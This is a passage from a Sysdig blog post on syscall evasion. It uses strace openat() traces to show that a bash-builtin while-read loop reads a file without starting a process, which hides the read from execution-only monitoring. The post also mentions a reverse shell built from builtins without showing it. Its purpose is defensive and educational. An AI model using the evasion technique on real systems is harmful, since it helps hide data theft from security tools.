Looking for Syscalls in All the Right Places

The problem we were encountering with not seeing the sneaky bash builtin activity was largely due to looking in the wrong place. We couldn’t see anything happening with execve() because there was nothing to see. In this case, we know a file is being opened, so let’s try one of the open syscalls. We’re going to cheat and jump directly to looking at openat(), but it could very well be any of the open syscalls we discussed earlier. 

1 – We’ll start up the strace-monitored bash shell again. This time, our filter is based on openat() instead of execve().

2 – Note that we see a pretty different view of what is taking place when bash starts up this time since we’re watching for files being opened. 

72 – Back at the prompt, we’ll run our sneaky bit of bash script to read the file. 

73 – Et voilà, we see the openat() syscall for our file being opened and the resulting output. 

$ strace -f -e trace=openat bash
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libtinfo.so.6", O_RDONLY|O_CLOEXEC) =
3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/dev/tty", O_RDWR|O_NONBLOCK) = 3
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache",
O_RDONLY) = 3
openat(AT_FDCWD, "/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/terminfo/x/xterm-256color", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bashrc", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
strace: Process 984240 attached
[pid 984240] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984240] openat(AT_FDCWD, "/usr/bin/lesspipe", O_RDONLY) = 3
strace: Process 984241 attached
[pid 984241] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984241] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984241, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984242 attached
strace: Process 984243 attached
[pid 984243] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984243] +++ exited with 0 +++
[pid 984242] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984243, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984242] +++ exited with 0 +++
[pid 984240] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED,
si_pid=984242, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
[pid 984240] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984240,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
strace: Process 984244 attached
[pid 984244] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD, "/usr/lib/locale/locale-archive",
O_RDONLY|O_CLOEXEC) = 3
[pid 984244] openat(AT_FDCWD,
"/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
[pid 984244] +++ exited with 0 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=984244,
si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
openat(AT_FDCWD, "/usr/share/bash-completion/bash_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/init.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/",
O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/apport_completion", O_RDONLY) = 3
openat(AT_FDCWD, "/etc/bash_completion.d/git-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/usr/lib/git-core/git-sh-prompt", O_RDONLY) = 3
openat(AT_FDCWD, "/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.bash_history", O_RDONLY) = 3
openat(AT_FDCWD, "/home/user/.inputrc", O_RDONLY) = -1 ENOENT (No such file or
directory)
openat(AT_FDCWD, "/etc/inputrc", O_RDONLY) = 3

$ while IFS= read -r line; do echo "$line"; done < testfile
openat(AT_FDCWD, "testfile", O_RDONLY)  = 3
supersecretdata

We can catch the activity from the shell builtins, in most cases, but it’s a matter of looking in the right places for the activity we want. It might be tempting to think we could just watch all the syscalls all the time, but doing so quickly becomes untenable. Our example above produces somewhere around 50 lines of strace output when we are filtering just for openat(). If we take the filtering off entirely and watch for all syscalls, it balloons out to 1,200 lines of output. 

This is being done inside a single shell with not much else going on. If we tried to do this across a running system, we would see exponentially more in the brief period of time before it melted down into a puddle of flaming goo from the load. In other words, there really isn’t any reasonable way to watch all the syscall activity all the time. The best we can do is to be intentional with what we choose to monitor. 
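One middle ground between tracing a single syscall and drowning in all of them is strace’s syscall classes, which bundle related calls under one filter. A sketch (the log path is arbitrary):

```shell
# The %file class covers the file-touching syscalls (open, openat, stat,
# and friends), so one filter catches whichever open variant an evasive
# command happens to use.
strace -f -e trace=%file -o /tmp/trace.log bash
# ...run the suspect commands in the traced shell, exit, then inspect:
grep testfile /tmp/trace.log
```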

Conclusion

This exploration into syscall evasion using bash shell builtins illuminates just a fraction of the creative and subtle ways in which system interactions can be manipulated to bypass security measures. Security tools that focus solely on process execution are inherently limited in scope, and a more nuanced, comprehensive approach to monitoring system activity is needed to provide a better level of security.

The simple example we put together for replicating the functionality of cat dodged this entirely and allowed us to read the data from our file while flying completely under the radar of tools that were only looking for process execution. Unfortunately, this is the tip of the iceberg. 

Using the bash builtins in a similar fashion to what we did above, there are a number of similar ways we can combine them to replicate functionality of other tools and attacks. A very brief amount of Googling will turn up a well-known method for assembling a reverse shell using the bash builtins. Furthermore, we have all the various shells and all their different sets of builtins at our disposal to tinker with (we’ll leave this as an exercise for the reader). 

In the coming articles in this series, we’ll look at some other methods of syscall evasion. If you want to learn more, explore Defense evasion techniques with Falco.  

The post Exploring Syscall Evasion – Linux Shell Built-ins appeared first on Sysdig.
